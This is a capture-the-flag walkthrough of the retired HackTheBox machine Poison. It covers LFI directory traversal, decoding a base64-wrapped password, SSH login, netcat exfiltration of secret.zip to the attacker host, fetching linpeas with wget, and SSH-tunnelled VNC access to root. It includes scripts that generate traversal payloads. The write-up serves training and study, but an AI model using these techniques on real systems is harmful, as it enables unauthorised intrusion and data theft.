HackTheBox - Retired - Poison
Recon
I've been using threader lately to do my initial scanning. It's a threaded port scanner written in Python by Joe Helle (https://twitter.com/joehelle).
You just supply an IP and it does a quick threaded up/down scan of all TCP ports, then pipes the open ports into an nmap scan for you and saves the output as XML.
I then convert the nmap XML to HTML with xsltproc to make it a bit easier to digest:
xsltproc 10.10.10.84.xml -o poison.html
Not much open here, just ports 22 and 80:
Port 80: Apache 2.4.29
Port 22: OpenSSH 7.2
We'll need a password or at least a key for SSH, so let's look at what port 80 is serving. I'll add poison.htb to my /etc/hosts to make it a bit easier.
"A temporary website to test local .php scripts"... This sounds really promising for getting a foothold here.
It states there are four scripts that can be tested.
The first thing I did was try not supplying a script at all.
That produced an error about the filename being empty.
OK, what if I supply a PHP filename that is not in the approved list?
It can't open the file because it can't find it. That makes sense, and it tells us the name we supply is being used directly to open a file.
Next I tried to see if we could reach other directories with directory traversal (LFI).
We sure can, here is the /etc/passwd file.
Here it is kinda cleaned up a bit
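As an added example (not code from the original write-up), here is how I would script the two steps above instead of hand-editing the URL: generate traversal payloads for a suspected include parameter, confirm a response really is /etc/passwd, and pull out the accounts that have a login shell. The endpoint name, the parameter name and the sample passwd text are constructed placeholders, since the write-up does not show the actual request.

```python
"""Added example (not from the original write-up): build directory-traversal
payloads for a suspected LFI parameter and pull the real login accounts out of
a leaked /etc/passwd. The URL, parameter name and sample passwd text are
constructed placeholders, not values taken from the box."""
import re
from urllib.parse import urlencode

# Hypothetical endpoint and parameter; the write-up does not name them.
BASE_URL = "http://poison.htb/example.php"
PARAM = "file"


def traversal_urls(base_url, param, target="/etc/passwd", max_depth=8):
    """Candidate LFI URLs: the absolute path first, then ../ chains of
    increasing depth in case the script prepends its own directory."""
    urls = [f"{base_url}?{urlencode({param: target})}"]
    rel = target.lstrip("/")
    for depth in range(1, max_depth + 1):
        urls.append(f"{base_url}?{urlencode({param: '../' * depth + rel})}")
    return urls


# name:password:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(r"^([^:]+):[^:]*:(\d+):(\d+):[^:]*:([^:]*):([^:]*)$")
NOLOGIN_SHELLS = {"nologin", "false", "sync", "halt", "shutdown"}


def looks_like_passwd(body):
    """True when the response contains a well-formed root: entry, i.e. the
    include really returned /etc/passwd rather than an error page."""
    return any(line.startswith("root:") and PASSWD_LINE.match(line)
               for line in body.splitlines())


def login_accounts(body):
    """Accounts with a real shell: the candidates worth trying over SSH."""
    users = []
    for line in body.splitlines():
        m = PASSWD_LINE.match(line.strip())
        if not m:
            continue
        name, uid, gid, home, shell = m.groups()
        if shell.rsplit("/", 1)[-1] in NOLOGIN_SHELLS:
            continue
        users.append({"name": name, "uid": int(uid), "home": home, "shell": shell})
    return users


def find_lfi(urls, fetch):
    """Return the first URL whose body looks like /etc/passwd, else None.
    `fetch` is any callable url -> str; for a live run pass something like
    lambda u: urllib.request.urlopen(u).read().decode(errors="replace")."""
    for url in urls:
        if looks_like_passwd(fetch(url)):
            return url
    return None


# Constructed sample in FreeBSD passwd layout (charix's uid and shell are assumed).
SAMPLE_PASSWD = """\
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
"""

if __name__ == "__main__":
    urls = traversal_urls(BASE_URL, PARAM)
    # Offline stand-in for the web server: only the 3-deep traversal "works".
    fake_fetch = lambda u: SAMPLE_PASSWD if u == urls[3] else "Warning: failed to open stream"
    print("LFI via:", find_lfi(urls, fake_fetch))
    for u in login_accounts(SAMPLE_PASSWD):
        print(u)
```

The fetch callable is injected so the logic can be exercised offline; swapping in urllib turns it into a live probe against a target you are authorised to test.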
OK, let's check out the scripts they do let us get to.
ini.php
Looks like some configuration settings; I don't see anything interesting popping out at me immediately. What is the next script?
info.php
A little data leakage here: we can see this is a 64-bit FreeBSD system.
What's next?
listfiles.php
This lists the files in the directory we have access to, and there is a file not mentioned on the site: pwdbackup.txt. Let's check out the last script and then come back to this.
phpinfo.php
This is the generic phpinfo output. It leaks a little more information, like the PHP version, 5.6.32, which is old now but might not have been when this box was created.
But what about that pwdbackup.txt file?
Let's plug that in and see what we get out.
They say it's an encoded version of their password... notice they don't say encrypted.
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=
The first thing I notice is that this looks like base64. One of the biggest tips for identifying base64 is the trailing "=": it is padding. There may be none, one or two of them, never three. Base64 turns every 3 bytes of input into 4 output characters, so if the input length is not a multiple of 3 the encoder appends "=" until the output length is a multiple of 4.
So they claim it's encoded at least 13 times.
I saved the base64 to my Kali machine in a file named passwd.txt (make sure to remove any spaces if you copy and paste).
Then I wanted to see whether the result of base64 -d on the file would still look like base64, so I ran:
cat ./passwd.txt | base64 -d
Still looks like base64. There is no "=" padding at the end this time, but that only means the data at this layer happened to be a multiple of 3 bytes, so no padding was needed.
Long story short, I kept appending "| base64 -d" and checking the output to see whether it looked strange or still like base64, until the 13th decode, which stopped looking like base64:
cat passwd.txt | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
I'm sure there is a better way to loop this, but this was easy and it let me keep an eye on the output in case they changed encoding methods partway through.
Charix!2#4%6&8(0
This was the final output; if we base64 -d one more time it says invalid input.
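The loop I was looking for, as an added example rather than anything from the original write-up: keep base64-decoding while the result still looks like base64, and stop when the next layer either fails to decode or turns into non-printable bytes. That second check matters because a short plaintext like "password" is itself a valid base64 string and would otherwise be "decoded" into junk. The sample blob below is constructed by wrapping the recovered password 13 times with the same 76-column newlines the base64 CLI emits; it is not the pwdbackup.txt contents from the box.

```python
"""Added example (not from the original write-up): peel nested base64 layers
automatically instead of chaining `base64 -d` by hand. The sample blob is
constructed here by wrapping a known string 13 times, mimicking the
newline-wrapped output of the base64 CLI; it is not the pwdbackup.txt from the box."""
import base64
import binascii
import re
import string

B64_TEXT = re.compile(rb"^[A-Za-z0-9+/]*={0,2}$")
PRINTABLE = set(string.printable.encode())


def is_base64_text(data):
    """Whitespace-stripped data that uses only the base64 alphabet, ends in at
    most two '=' and has a length divisible by 4."""
    compact = b"".join(data.split())
    return len(compact) > 0 and len(compact) % 4 == 0 and B64_TEXT.match(compact) is not None


def peel_base64(blob, max_layers=64):
    """Repeatedly base64-decode `blob` while the result is itself valid base64.
    Returns (payload_bytes, layers_removed). Stops when the next layer would
    not decode, or would decode to non-printable bytes, which is the sign the
    current layer is the real payload and only happens to look like base64."""
    data = blob if isinstance(blob, bytes) else blob.encode()
    layers = 0
    while layers < max_layers and is_base64_text(data):
        try:
            decoded = base64.b64decode(b"".join(data.split()), validate=True)
        except binascii.Error:
            break
        if not decoded or any(b not in PRINTABLE for b in decoded):
            break  # binary junk: keep `data`, it was the payload
        data = decoded
        layers += 1
    return data, layers


def wrap(data, layers):
    """Encode `data` `layers` times, inserting a newline every 76 characters
    like the base64 CLI does, so the peeler has to tolerate whitespace."""
    for _ in range(layers):
        enc = base64.b64encode(data)
        data = b"\n".join(enc[i:i + 76] for i in range(0, len(enc), 76)) + b"\n"
    return data


# Constructed sample: the password recovered in the write-up, wrapped 13 times.
SAMPLE = wrap(b"Charix!2#4%6&8(0", 13)

if __name__ == "__main__":
    payload, n = peel_base64(SAMPLE)
    print(f"{n} layers removed -> {payload.decode()}")
```

Feeding it the real file is just `peel_base64(open("passwd.txt", "rb").read())`; the whitespace stripping means you do not need to clean up the line wraps first.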
So now we have a password... but for what?
Right now I'm assuming it's for SSH.
There was one user in the passwd file we pulled from the server earlier whose name looks a lot like this password:
charix
Maybe next time they can just draw us a map
Exploit
ssh charix@poison.htb
And we are in.
Now we can read user.txt.
There is another file named secret.zip in this directory; let's grab it and see what's inside.
I just used netcat to send it over to my Kali box. This needs a listener first, so on my Kali box I ran:
nc -lnvp 5555 > secret.zip
Then on the Poison box:
nc 10.10.14.6 5555 < secret.zip
It was a small file so it transferred quickly.
When we try to unzip it, it asks for a password. I first tried fcrackzip with rockyou to break it, but that didn't find a working password.
What about the same password we used for SSH?
Yup, that worked, but the file itself just looks like garbage.
Let's try to find another escalation path for now.
I used SimpleHTTPServer to download linpeas onto Poison. On my Kali box:
python -m SimpleHTTPServer 8080
Then on Poison:
wget http://10.10.14.6:8080/linpeas.sh
Then gave it execute permission:
chmod +x ./linpeas.sh
I ran the script and saw a couple of interesting things in the output.
VNC is running as root.
VNC usually listens on port 5900 (display :0), and our nmap scan didn't see it.
netstat confirms that something is listening on 5901 and 5801, which are the VNC and HTTP-viewer ports for display :1.
So this is most likely VNC, but it is only listening locally, not on the network, so I can't get to it directly.
But we can reach it with an SSH local port forward:
ssh -L 5555:localhost:5901 charix@poison.htb
This says: any traffic sent to port 5555 on our local machine is forwarded through the SSH tunnel to port 5901 on Poison (localhost as seen from Poison).
Now we can try to connect to the VNC server:
vncviewer localhost:5555
The tunnel is working, because we are prompted for a password.
But we don't know this password...
Like other protocols, though, VNC can take a password file (the kind vncpasswd writes) instead of a typed password, via -passwd. The "garbage" in that secret file we found earlier is exactly what a VNC password file looks like, since the password is stored obfuscated rather than in clear text. Let's try it:
vncviewer localhost:5555 -passwd /home/circusmonkey404/Desktop/HTB/poison/secret
And with that we are presented with a VNC session on Poison as root.